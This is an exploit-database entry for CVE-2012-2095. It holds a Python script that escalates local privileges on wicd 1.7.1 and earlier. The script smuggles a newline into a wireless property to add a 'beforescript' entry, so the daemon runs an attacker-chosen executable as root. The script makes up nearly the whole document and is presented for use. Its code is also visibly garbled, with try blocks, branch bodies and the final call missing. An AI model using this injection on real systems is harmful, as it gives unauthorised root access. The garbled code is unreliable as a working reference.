wicd Local Privilege Esclation Exploit

EKU-ID: 1910 CVE: 2012-2095 OSVDB-ID:
Author: Anonymous Published: 2012-04-13 Verified: Verified



#wicd <= 1.7.1 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
import sys
import os
import time
import getopt

try: from wicd import dbusmanager
except: print "[!] WICD Error: libraries are not available. Is WICD installed?"; sys.exit(0)

class Error(Exception):
 def __init__(self, error):
 def __str__(self):
  return repr(self.errorStr)

class Wicd():
 def __init__(self):
   dbusInterfaces = dbusmanager.get_dbus_ifaces()
   self.wireless  = dbusInterfaces["wireless"]
   self.daemon  = dbusInterfaces["daemon"]
   raise Error("Daemon is not running")
  self.versionString = self.daemon.Hello()
 def versionLessThan(self, version):
  if int(self.versionString.replace(".",""))<=version:
   return True
   return False

class Exploit():
 def __init__(self, wicd, scriptPath):
  self.wicd = wicd
  self.scriptPath = scriptPath
 def getNets(self):
  nets = self.wicd.wireless.GetNumberOfNetworks()
  while nets < 1:
   nets = self.wicd.wireless.GetNumberOfNetworks()
  for net in range(nets):
   yield net
 def exploit(self):
  for net in self.getNets(): pass # Priming scan.
   self.wicd.wireless.SetWirelessProperty(0, "beforescript = "+ self.scriptPath +"\nrooted", "true")
   raise Error("Unable to exploit (SetWirelessProperty() failed.)")
   self.wicd.wireless.SaveWirelessNetworkProperty(0, "beforescript = "+ self.scriptPath +"\nrooted")
   raise Error("Unable to exploit (SetWirelessProperty() failed.)")
  propertyKey = 'bssid' # Could be essid, or any other identifiable wireless property
  vulnIdentifier = self.wicd.wireless.GetWirelessProperty(0, propertyKey)
  # TODO: Does this need a try construct?
  for net in self.getNets(): # Implicit, but required re-scan.
   if self.wicd.wireless.GetWirelessProperty(net, propertyKey) == vulnIdentifier:
    return True
  raise Error("Unable to exploit (Lost the network we were using)")

def usage():
 print "[!] Usage:"
 print " ( -h, --help ):"
 print "  Print this message."
 print " ( --scriptPath= ): Required, executable to run as root."
 print "  --scriptPath=/some/path/to/executable.sh"

def main():
 print "[$] WICD =< 1.7.0Day"
  opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "scriptPath="])
 except getopt.GetoptError, err:
  # Print help information and exit:
  print '[!] Parameter error:' + str(err) # Will print something like "option -a not recognized"
 for opt, arg in opts:
  if opt in ("-h", "--help"):
  elif opt =="--scriptPath":
   # I would be assuming to say we'll never get here.
   print "[!] Parameter error."
 if not scriptPath:
  print "[!] Parameter error: scriptPath not set."
  wicd = Wicd()
 except Error as error:
  print "[!] WICD Error: %s" % (error.errorStr)
 print "[*] WICD Connection Initialized! (Version: %s)" % (wicd.versionString)
 if not wicd.versionLessThan(171):
  print "[!] WICD Warning: version print exceeds 1.7.1: Trying anyhow."
 exploit = Exploit(wicd, scriptPath)
 print "[*] Attempting to exploit:"
 except Error as error:
  print "[!] Exploit Error: %s" % (error.errorStr)
 print "[*] Exploit appears to have worked."

# Standard boilerplate to call the main() function to begin
# the program.
if __name__=='__main__':